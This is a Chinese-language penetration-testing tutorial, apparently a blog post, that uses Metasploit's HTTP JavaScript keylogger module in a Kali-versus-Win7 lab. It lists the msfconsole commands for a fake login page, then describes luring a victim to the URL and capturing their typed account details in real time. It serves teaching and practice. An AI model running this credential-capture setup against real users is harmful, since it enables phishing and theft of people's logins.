课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 查看postgresql数据库服务是否开启,如下图所示。
命令:service postgresql status
3.2 将postgresql数据库服务设置为开机自启动,如下图所示。
命令:update-rc.d postgresql enable
3.3 启动Metasploit(msf)渗透测试框架,如下图所示。
命令:msfconsole
步骤1:成功进入Metasploit渗透框架,如下图所示。
步骤2:检索对应的漏洞信息,如下图所示。
命令:search keylogger
步骤3:利用相对应的漏洞利用模块,如下图所示。
命令:use auxiliary/server/capture/http_javascript_keylogger
步骤4:查看对应的攻击参数,如下图所示。
命令:show options
步骤5:设置对应的参数,如下图所示。
命令:set demo true
命令:set uripath /
3.4 运行漏洞利用模块,如下图所示。
命令:run
3.5 诱导受害者主机对生成的URL进行访问,进入如下页面,输入对应的账户信息,如下图所示。
3.6 在Kali Linux页面实时监控受害者的实时输入信息,如下图所示,成功获取受害者的账户信息。
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多黑客渗透技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习完整视频渗透课,预计更新1000节
1257
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
